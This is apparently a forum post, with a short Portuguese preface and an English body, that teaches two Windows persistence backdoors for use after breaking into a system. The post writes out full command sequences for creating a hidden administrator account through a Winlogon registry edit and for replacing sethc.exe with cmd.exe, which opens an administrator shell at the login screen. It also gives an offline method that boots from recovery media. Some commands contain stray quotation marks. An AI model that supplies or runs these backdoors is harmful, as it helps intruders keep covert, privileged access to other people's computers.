não vou me dar ao trabalho de traduzir dessa vez, muitos jã conehcem essa técnica que é basica! A preguiça nao me deixou traduzir! hauaa desculpem pessoal!
We will discuss 2 most commonly used methods of maintaining access in windows usually called as Backdoors.
1. In the first technique, After getting access to the system we create user account with administrator privilege, thus intrusion again is easy. Use the following commands in the command prompt or you can execute it as a premade batch file.
net user /add "username" "password" net localgroup administrators /add "username" reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v username /t REG_DWORD /d 0
2. The second method is more efficient and it is a much secret approach. The method is behind the following vulnerability. In window before logging in, that is when the login screen shows up there is only one .exe file that can be execute. The File is named “sethc.exe” in the system32 directory. This file is used to switch on the sticky keys and can be invoked by pressing shift key 5 times.
What we do here is that we rename the “cmd.exe” in System32 directory to “sethc.exe”, so that command prompt opens with administrator privilege when shift is pressed 5 times. But renaming as such in system32 directory is not possible so we copy the cmd.exe to some other location, rename it to “sethc.exe”and replace it with the old “sethc.exe”.
If you have administrator access to the account, execute the following command in cmd or as a batch file. You can also do it manually following the above steps, because it is just a rename and moving job.
takeown /f "C:\Windows\system32\sethc.exe" cacls "C:\Windows\System32\sethc.exe" /e /p %username%:F copy "C:\Windows\system32\cmd.exe" C:\Windows\" rename "C:\Windows\cmd.exe" sethc.exe rename "C:\Windows\system32\sethc.exe" sethc.exe.old copy "C:\Windows\sethc.exe" "C:\Windows\system32\"
If you don’t have administrator access, Boot off a windows recovery DVD, press Shift+F10 to spawn CMD, and type
copy "C:\Windows\system32\cmd.exe" C:\Windows\" rename "C:\Windows\cmd.exe" sethc.exe rename "C:\Windows\system32\sethc.exe" sethc.exe.old copy "C:\Windows\sethc.exe" "C:\Windows\system32\"
Very similar to the other one, just you didn’t need to edit permissions.
Now you will notice at any time (even when nobody is logged in and when you’re at the welcome screen) you can spawn cmd as an administrator by pressing shift 5 times quickly.